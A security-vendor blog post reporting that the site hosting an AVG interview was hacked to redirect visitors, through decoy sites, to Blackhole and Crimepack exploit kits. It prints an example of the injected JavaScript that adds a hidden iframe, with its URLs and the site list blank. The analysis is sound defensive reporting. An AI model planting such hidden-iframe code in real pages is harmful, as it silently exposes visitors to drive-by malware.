The Latest in IT Security

Hack found on AVG interview site


AVG Anti-Virus, a company headquartered not too many kilometers down the road from the AVAST main offices in Prague, promoted an interview with their community manager today on Facebook. Hoping to learn a thing or two, we curiously clicked on the link. To our surprise, avast! blocked it as a malicious URL.

When we attempted to open the URL, it was redirected to which triggered the blocking action. The only content on is one word – GOTCHA!

Senior Virus analyst, Jan Sirmer confirmed the attack when we couldn’t repeat the block. “The site where the AVG interview was published,, was hacked for sure, and redirects to a black hole site,” he said. “Malicious script on the site is checking visitor’s cookies, which is the reason why you don’t see the warning more than once.”

He went on to explain, “We receive only one word: GOTCHA. It’s probably because the attackers running on dumb site’s database with visiting IP addresses, and if they found this IP, only GOTCHA is returned. I think it helps them to be more secure from malware analysts and users looking into how they have been infected.”

After looking into the hack further, Sirmer discovered that the link to, or its variations, was injected to other legitimate sites too. Those links then led to malicious sites containing a black hole exploit kit.

Here is a list of some other dumb sites used as links in hacked legitimate websites:


Sirmer discovered that malicious site is one of the malicious sites where users were redirected from one of the dumb sites. includes a well-known exploit pack called Crimepack. This exploit pack uses a Java vulnerability and silently downloads malicious Java, PDF and flesh files onto users computers.

In the last four days, Sirmer found that the bad guys injected a link to one of the dumb sites in 138 unique legitimate sites that were visited by avast! users. This is not such a huge number, but the attackers focused on sites like which has lots of visitors.

An example of injected code:

if (document.getElementsByTagName(‘body’)[0]) { iframer(); } else { document.write(“<iframe src=’′ width=’10′ height=’10′ style=’visibility:hidden;position:absolute;left:0;top:0;’></iframe>”); } function iframer() { var f = document.createElement(‘iframe’); f.setAttribute(‘src’, ‘′); = ‘hidden’; = ‘absolute’; = ’0′; = ’0′; f.setAttribute(‘width’, ’10′); f.setAttribute(‘height’, ’10′); document.getElementsByTagName(‘body’)[0].appendChild(f); }

An image of our first visit to

And the second visit. Images provided by avast! Virus Lab.

This image has been marked to show the redirection to

Leave a reply



Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...



Latest Comments